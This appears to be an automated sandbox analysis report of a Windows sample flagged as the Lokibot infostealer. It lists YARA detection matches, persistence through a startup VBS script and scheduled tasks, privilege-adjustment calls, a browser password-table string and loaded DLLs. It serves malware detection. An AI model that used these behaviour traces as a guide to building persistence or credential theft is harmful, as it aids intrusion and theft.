Source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 4.2.Dhy2kmz.exe.6900000.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@99/9@1/2

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007837B5 GetLastError,FormatMessageW,

0_2_007837B5

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007710BF AdjustTokenPrivileges,CloseHandle,	0_2_007710BF
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_007716C3
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000910BF AdjustTokenPrivileges,CloseHandle,	2_2_000910BF
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_000916C3

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007851CD

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0079A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0079A67C

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0078648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0078648E

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007142A2

Source: C:\Users\user\Desktop\9876567899.bat.exe

File created: C:\Users\user\AppData\Local\preinhered

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:64:WilError_03

Source: C:\Users\user\Desktop\9876567899.bat.exe

File created: C:\Users\user\AppData\Local\Temp\shrugged

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"

Source: 9876567899.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000003.00000003.2030073690.0000000002DB5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9876567899.bat.exe

Virustotal: Detection: 29%

Source: C:\Users\user\Desktop\9876567899.bat.exe

File read: C:\Users\user\Desktop\9876567899.bat.exe

Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9876567899.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Section loaded: uxtheme.dll
